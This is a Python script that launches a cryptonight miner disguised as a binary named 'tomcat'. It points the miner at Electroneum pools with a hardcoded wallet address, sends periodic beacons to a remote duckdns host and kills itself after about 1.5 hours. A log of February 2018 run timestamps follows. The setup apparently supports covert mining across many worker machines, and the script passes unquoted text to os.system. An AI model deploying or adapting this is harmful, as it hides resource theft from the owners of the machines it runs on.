import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:14:07.255235
#2018-02-17 17:02:06.482475
#2018-02-17 18:51:02.132823
#2018-02-17 20:39:03.842942
#2018-02-17 22:26:01.338480
#2018-02-18 00:08:06.997257
#2018-02-18 01:59:05.738015
#2018-02-18 03:46:02.115415
#2018-02-18 05:34:04.170978
#2018-02-18 07:27:04.129976
#2018-02-18 09:14:03.867508
#2018-02-18 11:01:05.117592
#2018-02-18 12:47:06.430154
#2018-02-18 14:33:03.754988
#2018-02-18 16:23:05.462415
#2018-02-18 18:12:07.358704
#2018-02-18 19:59:06.838512
#2018-02-18 21:46:07.576381
#2018-02-18 23:36:05.389478
#2018-02-19 01:22:01.324109
#2018-02-19 03:10:01.531600
#2018-02-19 04:55:04.075847
#2018-02-19 06:40:06.764465
#2018-02-19 08:30:01.421175
#2018-02-19 10:19:05.058401
#2018-02-19 12:07:01.704246
#2018-02-19 13:53:04.328289
#2018-02-19 15:42:09.128060
#2018-02-19 17:29:02.088646
#2018-02-19 19:17:08.503385
#2018-02-19 21:04:07.536327
#2018-02-19 22:52:01.839507
#2018-02-20 00:35:08.619067
#2018-02-20 02:23:04.108500
#2018-02-20 04:13:07.246553
#2018-02-20 05:56:08.103213
#2018-02-20 07:42:07.074950
#2018-02-20 09:26:08.080798
#2018-02-20 11:10:06.739765
#2018-02-20 12:57:07.676112
#2018-02-20 14:41:06.116057
#2018-02-20 16:27:04.942838
#2018-02-20 18:14:07.478393
#2018-02-20 20:06:05.943123
#2018-02-20 21:53:03.698642
#2018-02-20 23:35:08.295963
#2018-02-21 01:20:07.564404
#2018-02-21 03:07:07.400671
#2018-02-21 04:53:06.820667
#2018-02-21 06:42:06.885271
#2018-02-21 08:27:07.303331
#2018-02-21 10:13:09.685805
#2018-02-21 12:02:01.699068
#2018-02-21 13:50:06.425652
#2018-02-21 15:34:07.063829
#2018-02-21 17:23:06.314714
#2018-02-21 19:12:07.438771
#2018-02-21 21:01:07.103488
#2018-02-21 22:49:01.589051
#2018-02-22 00:38:07.622759
#2018-02-22 02:27:07.298637
#2018-02-22 04:14:07.412712
#2018-02-22 05:59:06.012262
#2018-02-22 07:46:01.460764
#2018-02-22 09:33:01.869263
#2018-02-22 11:19:01.286407
#2018-02-22 13:05:07.396900
#2018-02-22 14:52:03.903726
#2018-02-22 16:38:07.416260
#2018-02-22 18:25:08.924299
#2018-02-22 20:20:07.804131
#2018-02-22 22:08:01.600792
#2018-02-22 23:54:06.994981
#2018-02-23 01:42:03.986431
#2018-02-23 03:28:01.390208
#2018-02-23 05:14:01.366352
#2018-02-23 06:59:03.499311
#2018-02-23 08:49:05.728292
#2018-02-23 11:08:04.354082
#2018-02-23 13:02:07.450916
#2018-02-23 14:47:04.455751
#2018-02-23 16:38:02.146659
#2018-02-23 18:25:13.357290
#2018-02-23 20:10:03.856067
#2018-02-23 21:59:08.247166
#2018-02-23 23:47:04.899650
#2018-02-24 01:33:06.719655
#2018-02-24 03:23:07.324947
#2018-02-24 05:08:07.065165
#2018-02-24 06:57:05.021041
#2018-02-24 08:47:04.823757
#2018-02-24 10:51:04.014433
#2018-02-24 12:38:06.165028
#2018-02-24 14:27:03.687576
#2018-02-24 16:15:04.144545
#2018-02-24 18:09:04.805650
#2018-02-24 19:56:05.452477
#2018-02-24 21:40:07.801079
#2018-02-25 00:32:03.544492
#2018-02-25 04:09:06.637804
#2018-02-25 07:40:03.967658